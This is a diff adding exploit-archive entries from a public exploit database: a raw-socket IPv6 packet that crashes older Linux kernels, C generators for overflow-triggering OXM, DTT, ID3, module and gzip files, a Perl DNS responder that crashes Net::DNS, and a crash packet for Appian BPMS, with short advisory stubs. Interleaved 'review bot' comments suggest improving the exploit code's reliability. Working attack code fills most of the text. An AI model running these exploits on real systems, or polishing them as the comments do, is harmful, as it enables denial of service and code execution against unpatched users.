@@ -0,0 +1,150 @@ +source: http://www.securityfocus.com/bid/26943/info + +The Linux kernel is prone to a remote denial-of-service vulnerability because it fails to adequately validate specially crafted IPv6 'Hop-By-Hop' headers. + +Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users. + +/* + * Clemens Kurtenbach + * PoC code for exploiting the jumbo bug found in + * linux kernels >=2.6.20 and <=2.6.21.1 + * gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash + * + */ + + +/* io */ +#include +#include +#include + +/* network */ +#include +#include +#include +#include +#include +#include + +#define MY_FRAME_LEN 1145 + +char *resolve6(unsigned char *target) { + char *ret_addr; + struct in6_addr my_in6; + char *glob_addr = (char *) &my_in6; + struct addrinfo addr_hints, *addr_result; + unsigned char out[64]; + + memset(&addr_hints, 0, sizeof(addr_hints)); + addr_hints.ai_family = AF_INET6; + + if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) { + printf("getaddrinfo() error\n"); + exit(1); + } + if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, +out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){ + printf("getnameinfo() error\n"); + exit(1); + } + if(inet_pton(AF_INET6, out, glob_addr) < 0) { + printf("inet_pton() error\n"); + exit(1); + } + if((ret_addr = malloc(16)) == NULL) { + printf("malloc() error\n"); + exit(1); + } + memcpy(ret_addr, my_in6.s6_addr, 16); + return ret_addr; +} + +int main(int argc, char *argv[]) { + + if (argc < 4) { + printf("usage: ./ipv6_jumbo_crash +<00:11:22:33:44:55> \n"); + exit(1); + } + + /* handle IPv6 destination */ + unsigned char *dest_ip = resolve6(argv[1]); + + /* handle MAC */ + unsigned char dest_mac[7]; + sscanf(argv[2], "%x:%x:%x:%x:%x:%x", + (unsigned int*)&dest_mac[0], (unsigned +int*)&dest_mac[1], + (unsigned int*)&dest_mac[2], (unsigned +int*)&dest_mac[3], + (unsigned int*)&dest_mac[4], (unsigned +int*)&dest_mac[5]); + + /* handle interface */ + unsigned char 
*iface; + iface = argv[3]; + + /* buffer for ethernet frame */ + void *buffer = (void*)malloc(MY_FRAME_LEN); + + /* pointer to ethenet header */ + unsigned char *etherhead = buffer; + struct ethhdr *eh = (struct ethhdr *)etherhead; + + /* our MAC address */ + unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 +}; + unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02}; + + /* prepare socket */ + int s; + s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) { + printf("cannot create socket: [%d]\n",s); + exit(1); + } + + /* RAW communication */ + struct sockaddr_ll socket_address; + socket_address.sll_family = PF_PACKET; + socket_address.sll_protocol = htons(ETH_P_IP); + socket_address.sll_ifindex = if_nametoindex(iface); + socket_address.sll_hatype = ARPHRD_ETHER; + socket_address.sll_pkttype = PACKET_OTHERHOST; + socket_address.sll_halen = ETH_ALEN; + + /* set the frame header */ + memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN); + memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN); + eh->h_proto = 0xdd86; // IPv6 + + /* the buffer we want to send */ + unsigned char bad_buffer[] = { + 0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, +0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, + 0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 }; + + memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN); + + /* overwrite our src and dst ip */ + memcpy((void*)(buffer+22), (void*)src_ip, 16); + memcpy((void*)(buffer+38), dest_ip, 16); + + /* send the buffer */ + int send_result = 0; + send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct +sockaddr*)&socket_address, sizeof(socket_address)); + if (send_result == -1) { + printf("could not send frame: [%d]\n", send_result); + exit(1); + } + else printf("frame send to ip [%s] with mac [%s] on 
iface +[%s]\n",argv[1],argv[2],argv[3]); + + return 0; +} diff --git a/platforms/linux/dos/30942.c b/platforms/linux/dos/30942.c new file mode 100755 index 000000000..c079254b0 --- /dev/null +++ b/platforms/linux/dos/30942.c 
@@ -0,0 +1,157 @@ +source: http://www.securityfocus.com/bid/27047/info + +Extended Module Player (xmp) is prone to multiple local buffer-overflow vulnerabilities because it fails to perform adequate boundary checks before copying user-supplied input into an insufficiently sized buffer. + +These issues occur when the application handles specially crafted OXM and DTT files. + +Attackers can exploit these issues to execute arbitrary code that could compromise the affected computer. Failed attacks will likely cause denial-of-service conditions. + +Extended Media Player 2.5.1 is vulnerable; other versions may also be affected. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include + + + +#define VER "0.1" +#define BUFFSZ 8192 +#define BOFCHR 0x41414141 +#define BOF1SZ 380 +#define BOF2SZ 3000 +#define u8 unsigned char + + + +int putmm(u8 *data, u8 *src, int len); +int putxx(u8 *data, unsigned num, int bits); +void std_err(void); + + + +int main(int argc, char *argv[]) { + FILE *fd; + int i, + attack; + u8 buff[BUFFSZ], + *fname, + *p; + + setbuf(stdout, NULL); + + fputs("\n" + "Extended Module Player <= 2.5.1 buffer-overflow "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 3) { + printf("\n" + "Usage: %s \n" + "\n" + "Attack:\n" + " 1 = test_oxm, only *nix XMP reads this format (*.OXM)\n" + " 2 = dtt_load (*.DTT)\n" + "\n", argv[0]); + exit(1); + } + + attack = atoi(argv[1]); + fname = argv[2]; + + p = buff; + + if(attack == 1) { + printf("- test_oxm\n"); + + p += putmm(p, "Extended Module:", 16); + p += putmm(p, "", 60 - 16); + p += putxx(p, 14, 32); // hlen + p += putmm(p, "", 6); + p += putxx(p, 0, 16); // npat + p += putxx(p, 1, 16); // nins + p += putxx(p, -1, 32); // ilen + for(i = 0; i < 32; i++) { + *p++ = 0xff; // buf + 27 (nsmp) + } // force return + for(i = 0; i < BOF2SZ; i++) { + *p++ = BOFCHR & 0xff; // buf + } + + } else if(attack == 2) { + printf("- dtt_load\n"); + + p += 
putxx(p, 'D', 8); + p += putxx(p, 's', 8); + p += putxx(p, 'k', 8); + p += putxx(p, 'T', 8); + p += putmm(p, "name", 64); + p += putmm(p, "author", 64); + p += putxx(p, 0, 32); // flags + p += putxx(p, 0, 32); // m->xxh->chn + p += putxx(p, 0, 32); // m->xxh->len + p += putmm(p, "", 8); // buf + p += putxx(p, 0, 32); // m->xxh->tpo + p += putxx(p, 0, 32); // m->xxh->rst + p += putxx(p, BOF1SZ, 32); // m->xxh->pat + p += putxx(p, 0, 32); // m->xxh->ins = m->xxh->smp + p += putmm(p, "", 3); // fread(m->xxo, 1, (m->xxh->len ++ 3) & ~3L, f); + for(i = 0; i < BOF1SZ; i++) { + p += putxx(p, BOFCHR, 32); // first buffer-overflow + } + for(i = 0; i < (((BOF1SZ + 3) >> 2) << 2); i++) { + *p++ = BOFCHR & 0xff; // second buffer-overflow + } + + } else { + printf("\nError: wrong attack number (%d)\n", attack); + exit(1); + } + + printf("- create file %s\n", fname); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + fwrite(buff, 1, p - buff, fd); + fclose(fd); + printf("- done\n"); + return(0); +} + + + +int putmm(u8 *data, u8 *src, int len) { + strncpy(data, src, len); + return(len); +} + + + +int putxx(u8 *data, unsigned num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + + for(i = 0; i < bytes; i++) { + data[i] = (num >> (i << 3)) & 0xff; + } + return(bytes); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + + + diff --git a/platforms/linux/remote/30728.txt b/platforms/linux/remote/30728.txt new file mode 100755 index 000000000..dcfe14327 --- /dev/null +++ b/platforms/linux/remote/30728.txt 
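Review bot: The fwrite() result in main() is discarded before fclose() and `- done` is printed regardless, so a short or failed write (full disk, read-only target) leaves a truncated file that is reported as success; `if(fwrite(buff, 1, p - buff, fd) != (size_t)(p - buff)) std_err();` and `if(fclose(fd)) std_err();` would match how an fopen() failure is already routed through std_err(). The same unchecked fwrite()/fclose() pair appears in the main() of 30903.c, 30906.c and 30922.c in this commit. Separately, putmm() declares `u8 *src` but is only ever called with string literals and forwards them to strncpy(), which takes `char *`; declaring the parameter `const char *src` removes the pointer-sign mismatch without changing what is written.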
@@ -0,0 +1,10 @@
+source: www.securityfocus.com/bid/26273/info
+
+Yarssr is prone to a remote code-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to inject and execute arbitrary malicious Perl code with the privileges of the user running the application. Successful exploits can compromise the application and possibly the underlying computer; other attacks are also possible.
+
+Yarssr 0.2.2 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30728.rss
+
diff --git a/platforms/linux/remote/30895.pl b/platforms/linux/remote/30895.pl
new file mode 100755
index 000000000..a06fe0524
--- /dev/null
+++ b/platforms/linux/remote/30895.pl
@@ -0,0 +1,39 @@ +source: http://www.securityfocus.com/bid/26902/info + +The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses. + +Successfully exploiting this issue allows attackers to crash applications that use the affected module. + +Net::DNS 0.60 is vulnerable; other versions may also be affected. + +#!/usr/bin/perl +# Beyond Security(c) +# Vulnerability found by beSTORM - DNS Server module + +use strict; +use IO::Socket; +my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO); +$MAXLEN = 1024; +$PORTNO = 5351; +$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die "socket: $@"; +print "Awaiting UDP messages on port $PORTNO\n"; + +my $oldmsg = "\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61". +"\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03". +"\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79". +"\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00". +"\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62". +"\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f". +"\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03". +"\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69". +"\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e". +"\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01". +"\x00\x01\x00\x00\x00\x01\x00\x01\x41"; +while ($sock->recv($newmsg, $MAXLEN)) { + my($port, $ipaddr) = sockaddr_in($sock->peername); + $hishost = gethostbyaddr($ipaddr, AF_INET); + print "Client $hishost said ``$newmsg''\n"; + $sock->send($oldmsg); + $oldmsg = "[$hishost] $newmsg"; +} +die "recv: $!"; diff --git a/platforms/multiple/dos/30779.txt b/platforms/multiple/dos/30779.txt new file mode 100755 index 000000000..1d9c22d9e --- /dev/null +++ b/platforms/multiple/dos/30779.txt 
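Review bot: `$oldmsg` is declared twice in the same scope — once in the `my($sock, $oldmsg, ...)` list near the top and again as `my $oldmsg = "\x5a\x40..."` — which is exactly the "my variable masks earlier declaration" case that `use warnings` would flag, and the script enables `use strict` but not `use warnings`. Dropping `$oldmsg` from the first list (or assigning to it without the second `my`) keeps a single declaration, and adding `use warnings;` next to `use strict;` would surface this class of slip. gethostbyaddr() returns undef when the reverse lookup fails, so `$hishost` may interpolate as an empty string in the print; `$hishost = gethostbyaddr($ipaddr, AF_INET) // inet_ntoa($ipaddr);` would at least keep the address visible in the log line.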
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26502/info
+
+Rigs of Rods is prone to a remote buffer-overflow because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
+
+An attacker could exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial of service.
+
+This issue affects Rigs of Rods 0.33d and prior versions.
+
+http://www.exploit-db.com/sploits/30779.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/30791.txt b/platforms/multiple/dos/30791.txt
new file mode 100755
index 000000000..9a5fa1bd7
--- /dev/null
+++ b/platforms/multiple/dos/30791.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26516/info
+
+Multiple denial-of-service vulnerabilities affect I Hear U because the application fails to handle specially crafted packets.
+
+An attacker may leverage these issues to cause a remote denial-of-service condition in affected applications.
+
+These issues affect versions prior to I Hear U 0.5.7.
+
+http://www.exploit-db.com/sploits/30791.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/30856.txt b/platforms/multiple/dos/30856.txt
new file mode 100755
index 000000000..7362ce518
--- /dev/null
+++ b/platforms/multiple/dos/30856.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26771/info
+
+Easy File Sharing Web Server is prone to a directory-traversal and multiple information-disclosure vulnerabilities.
+
+Successfully exploiting these issues allows remote attackers to upload files to arbitrary locations and to access potentially sensitive information, which may aid in further attacks.
+
+Easy File Sharing Web Server 4.5 is vulnerable to these issues; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30856.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/30896.txt b/platforms/multiple/dos/30896.txt
new file mode 100755
index 000000000..cdc8fb629
--- /dev/null
+++ b/platforms/multiple/dos/30896.txt
@@ -0,0 +1,48 @@ +source: http://www.securityfocus.com/bid/26913/info + +Appian Business Process Management Suite (BPMS) is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted packets. + +Successfully exploiting this issue allows remote attackers to crash the affected application, denying further service to legitimate users. + +This issue affects Appian BPMS 5.6 SP1; other versions may be vulnerable as well. + +\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x73\x61\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x31\x35\x39\x36\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x04\x03\x01\x06\x0a\x09\x01\x01\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x73\x61\x69\x6e\x74\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x05\x73\x61\x69\x6e\x74\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 
+\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x0a\x05\x00\x00\x00\x43\x54\x2d\x4c\x69\x62\x72\x61\x72\x79 +\x0a\x05\x00\x00\x00\x00\x0d\x11\x00\x73\x5f\x65\x6e\x67\x6c\x69 +\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x02\x01\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x69\x73\x6f +\x5f\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x35\x31\x32 +\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33 +\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00 +\x00 + diff --git a/platforms/multiple/dos/30903.c b/platforms/multiple/dos/30903.c new file mode 100755 index 000000000..234131e66 --- /dev/null +++ b/platforms/multiple/dos/30903.c 
@@ -0,0 +1,100 @@ +source: http://www.securityfocus.com/bid/26945/info + +The 'id3lib' library is prone to a buffer-overflow vulnerability. + +An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application or to crash the application, denying further service to legitimate users. + +This issue affects versions of id3lib committed to the CVS repository; other versions may also be affected. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include + + + +#define VER "0.1" +#define u8 unsigned char +#define MASK(bits) ((1 << (bits)) - 1) + + + +int w28(u8 *data, unsigned num); +void std_err(void); + + + +int main(int argc, char *argv[]) { + FILE *fd; + int i; + u8 buff[1024], + *p; + + setbuf(stdout, NULL); + + fputs("\n" + "id3lib (devel CVS) array overflow "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 2) { + printf("\n" + "Usage: %s \n" + "\n", argv[0]); + exit(1); + } + + p = buff; + *p++ = 'I'; // "ID3" + *p++ = 'D'; + *p++ = '3'; + *p++ = 4; // ID3v2 4.0 + *p++ = 0; + *p++ = 1 << 6; // flags: extended + p += w28(p, 0); // this->SetDataSize + p += w28(p, 0); // not used by id3lib + *p++ = 6; // extflagbytes + for(i = 0; i < 20; i++) { + *p++ = 0xcc; + } + + printf("- create file %s\n", argv[1]); + fd = fopen(argv[1], "wb"); + if(!fd) std_err(); + fwrite(buff, 1, p - buff, fd); + fclose(fd); + printf("- done\n"); + return(0); +} + + + +int w28(u8 *data, unsigned num) { + const unsigned short BITSUSED = 7; + const unsigned MAXVAL = MASK(BITSUSED * 4); + int i; + + if(num > MAXVAL) num = MAXVAL; + + for(i = 0; i < 4; i++) { + data[4 - i - 1] = num & MASK(BITSUSED); + num >>= BITSUSED; + } + return(4); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + + diff --git a/platforms/multiple/dos/30906.c b/platforms/multiple/dos/30906.c new file mode 100755 index 000000000..04c0a57b6 --- /dev/null 
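Review bot: w28() carries no comment on the encoding it produces — four bytes of seven bits each, most-significant group first, with the input clamped to MASK(28) — so a reader has to reverse the loop to see why `4` and `BITSUSED * 4` are hard-coded; this looks like the ID3v2 "synchsafe" size encoding but nothing in the file says so. A header comment such as `// 28-bit value packed 7 bits per byte, MSB first (ID3v2 size field); inputs above MASK(28) are clamped` above the definition would let the two `p += w28(p, 0)` calls in main() be checked against the tag layout they are commented with. The `#define u8 unsigned char` would also be safer as `typedef unsigned char u8;`, since a macro expanding to two tokens behaves differently in declarations such as `u8 buff[1024], *p;` than the typedef a reader expects.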
+++ b/platforms/multiple/dos/30906.c 
@@ -0,0 +1,222 @@ +source: http://www.securityfocus.com/bid/26953/info + +ProWizard 4 PC is prone to multiple stack-based buffer-overflow issues because it fails to perform adequate boundary checks on user-supplied data. + +Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions. + +These issues affect ProWizard 4 PC 1.62 and prior versions; other versions may also be vulnerable. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include + + + +#define VER "0.1" +#define BUFFSZ 0xffff +#define BOFCHR 0x58585858 +#define u8 unsigned char + + + +int putxx(u8 *data, unsigned num, int bits); +void std_err(void); + + + +int main(int argc, char *argv[]) { + FILE *fd; + int i, + j, + attack, + samp_off, + inst_off, + songs_off, + bofnum; + u8 *fname, + *buff, + *p, + *file_size; + + setbuf(stdout, NULL); + + fputs("\n" + "Pro-Wizard <= 1.62 multiple buffer-overflow "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 3) { + printf("\n" + "Usage: %s \n" + "\n" + "Attack:\n" + " 1 = AMOS-MusicBank\n" + " 2 = FuzzacPacker\n" + " 3 = QuadraComposer\n" + " 4 = SkytPacker (unexploitable due to only one byte in a 32 bit array)\n" + "\n", argv[0]); + exit(1); + } + + attack = atoi(argv[1]); + fname = argv[2]; + + buff = malloc(BUFFSZ); + if(!buff) std_err(); + memset(buff, 0, BUFFSZ); + p = buff; + + songs_off = 256; // some values + samp_off = 256; + inst_off = 1024; + bofnum = 255; + file_size = NULL; + + if(attack == 1) { + printf("- AMOS-MusicBank\n"); + + p += putxx(p, 'A', 8); + p += putxx(p, 'm', 8); + p += putxx(p, 'B', 8); + p += putxx(p, 'k', 8); + p += putxx(p, 0x00, 8); + p += putxx(p, 0x03, 8); + p += putxx(p, 0x00, 8); + p += putxx(p, 0x01, 8); + file_size = p; // BANK_LEN + p += 4; + p += putxx(p, 'M', 8); + p += putxx(p, 'u', 8); + p += putxx(p, 's', 8); + p 
+= putxx(p, 'i', 8); + p += putxx(p, 'c', 8); + p += putxx(p, ' ', 8); + p += putxx(p, ' ', 8); + p += putxx(p, ' ', 8); + p += putxx(p, inst_off, 32); // INST_HDATA_ADDY + p += putxx(p, songs_off, 32); // SONGS_DATA_ADDY + p += putxx(p, 0, 32); // PAT_DATA_ADDY + p = buff + (songs_off + 0x14); + p += putxx(p, 1, 16); + p += putxx(p, 0, 32); + p = buff + (inst_off + 0x14); + + p += putxx(p, bofnum, 16); // samples + for(i = 0; i < bofnum; i++) { + putxx(p, BOFCHR, 32); + p += 32; + } + + putxx(file_size, (p - buff) - 12, 32); + + } else if(attack == 2) { + printf("- FuzzacPacker\n"); + + p += putxx(p, 'M', 8); + p += putxx(p, '1', 8); + p += putxx(p, '.', 8); + p += putxx(p, '0', 8); + p += 2 + (68 * 31); + p += putxx(p, bofnum, 8); // PatPos + p += putxx(p, 0, 8); // NbrTracks + p = buff + 2118; + + for(i = 0; i < (4 * bofnum * 4); i++) { + p += putxx(p, bofnum, 8); + } + p += putxx(p, BOFCHR, 32); + + } else if(attack == 3) { + printf("- QuadraComposer\n"); + + bofnum = 32; // max 32 + + p += putxx(p, 'F', 8); + p += putxx(p, 'O', 8); + p += putxx(p, 'R', 8); + p += putxx(p, 'M', 8); + file_size = p; + p += 4; + p += putxx(p, 'E', 8); + p += putxx(p, 'M', 8); + p += putxx(p, 'O', 8); + p += putxx(p, 'D', 8); + p += putxx(p, 'E', 8); + p += putxx(p, 'M', 8); + p += putxx(p, 'I', 8); + p += putxx(p, 'C', 8); + p = buff + 22 + 41; + p += putxx(p, bofnum, 8); + for(i = 0; i < bofnum; i++) { + p[0] = i + 0x70; + putxx(p + 2, BOFCHR / 2, 16); + putxx(p + 30, BOFCHR, 32); + p += 34; + } + p += 1000; + + putxx(file_size, (p - buff) - 8, 32); + + } else if(attack == 4) { + printf("- SkytPacker\n"); + + p += 256; + p += putxx(p, 'S', 8); + p += putxx(p, 'K', 8); + p += putxx(p, 'Y', 8); + p += putxx(p, 'T', 8); + p = buff + 260; + p += putxx(p, bofnum - 1, 8); + for(i = 0; i < bofnum; i++) { + for(j = 0; j < 4; j++) { + p += putxx(p, BOFCHR, 8); + p += putxx(p, BOFCHR, 8); + } + } + p += 22529; + + } else { + printf("\nError: wrong attack number (%d)\n", attack); + 
exit(1); + } + + printf("- create file %s\n", fname); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + fwrite(buff, 1, p - buff, fd); + fclose(fd); + free(buff); + printf("- done\n"); + return(0); +} + + + +int putxx(u8 *data, unsigned num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + + for(i = 0; i < bytes; i++) { + data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff; + } + return(bytes); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + + diff --git a/platforms/multiple/dos/30922.c b/platforms/multiple/dos/30922.c new file mode 100755 index 000000000..9f35bff72 --- /dev/null +++ b/platforms/multiple/dos/30922.c 
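Review bot: putxx() here emits `num` big-endian — `data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff` — whereas the putxx() with the same name and signature in 30942.c and 30922.c of this commit is little-endian (`num >> (i << 3)`), and nothing in the file records the difference; the same name for opposite byte orders is an easy trap for anyone copying these helpers between files. A one-line comment above the definition, `// big-endian: most significant byte first (the putxx() in 30942.c/30922.c is little-endian)`, makes the contract visible. The attack 1 loop also does `putxx(p, BOFCHR, 32); p += 32;`, advancing 32 bytes after a 4-byte write, unlike every other loop that steps by the return value — presumably a fixed-size record stride, but a comment saying so would keep it from being "corrected" to `p += putxx(...)`.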
@@ -0,0 +1,109 @@ +source: http://www.securityfocus.com/bid/26979/info + +WinUAE is prone to a local stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. + +An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. + +This issue affects versions prior to WinUAE 1.4.5. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include + + + +#define VER "0.1" +#define BOFSZ 10000 // 1000 + 8192 + the rest +#define BUFFSZ (BOFSZ + 32) +#define u8 unsigned char + + + +int putsc(u8 *data, int chr, int len); +int putxx(u8 *data, unsigned num, int bits); +void std_err(void); + + + +int main(int argc, char *argv[]) { + FILE *fd; + u8 *fname, + *buff, + *p; + + setbuf(stdout, NULL); + + fputs("\n" + "WinUAE <= 1.4.4 gunzip buffer-overflow "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 2) { + printf("\n" + "Usage: %s \n" + "\n", argv[0]); + exit(1); + } + + fname = argv[1]; + + buff = malloc(BUFFSZ); + if(!buff) std_err(); + + p = buff; + p += putxx(p, 0x1f, 8); // header[0] + p += putxx(p, 0x8b, 8); // header[1] + p += putxx(p, 0x00, 8); // header[2] + p += putxx(p, 0x08, 8); // flags + p += putsc(p, 0x00, 6); // rest of the header + p += putsc(p, 'A', BOFSZ); // filename buffer-overflow + p += putxx(p, 0, 8); // NULL byte delimiter + p += putxx(p, -1, 32); // force the return + + printf("- create file %s\n", fname); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + fwrite(buff, 1, p - buff, fd); + fclose(fd); + free(buff); + printf("- done\n"); + return(0); +} + + + +int putsc(u8 *data, int chr, int len) { + memset(data, chr, len); + return(len); +} + + + +int putxx(u8 *data, unsigned num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + + for(i = 0; i < bytes; i++) { + 
data[i] = (num >> (i << 3)) & 0xff; + } + return(bytes); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + + diff --git a/platforms/multiple/remote/30850.txt b/platforms/multiple/remote/30850.txt new file mode 100755 index 000000000..9eab41640 --- /dev/null +++ b/platforms/multiple/remote/30850.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26732/info + +HFS HTTP File Server is prone to a vulnerability that lets attackers upload files and place them in arbitrary locations on the server. The issue occurs because the software fails to adequately sanitize user-supplied input. + +A successful exploit may allow the attacker to upload malicious files and potentially execute them; this may lead to various attacks. + +This issue affects versions prior to HTTP File Server 2.2b. + +http://www.exploit-db.com/sploits/30850.zip \ No newline at end of file diff --git a/platforms/multiple/remote/30905.txt b/platforms/multiple/remote/30905.txt new file mode 100755 index 000000000..14b8dcbea --- /dev/null +++ b/platforms/multiple/remote/30905.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/26949/info + +Adobe Flash Player is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + 